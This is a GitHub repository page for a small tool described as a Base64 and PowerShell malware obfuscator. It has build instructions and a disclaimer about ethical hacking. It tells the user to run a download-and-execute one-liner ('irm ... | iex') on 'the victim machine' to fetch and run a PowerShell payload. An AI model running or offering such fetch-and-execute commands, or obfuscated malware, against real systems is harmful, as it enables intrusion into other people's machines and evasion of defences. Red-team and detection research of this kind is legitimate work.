Skip to content

joaostack/SimpleMalObfuscator

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 

Repository files navigation

SimpleMalObfuscator

Base64 and Powershell malware obfuscator based.
⚠️ Please respect ethical hacking principles and only test in environments you own or have permission to test.

Demo

Screenshot 2025-06-08 154954

Install

git clone https://github.com/joaostack/SimpleMalObfuscator; cd SimpleMalObfuscator
dotnet restore
dotnet publish -p:PublishSingleFile=true

And go to bin/Release folder.
Execute on the victim machine powershell

irm http://localhost/FILE.ps1 | iex

Author

João H. (joaostack) – GitHub

About

Base64 and Powershell malware obfuscator based

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages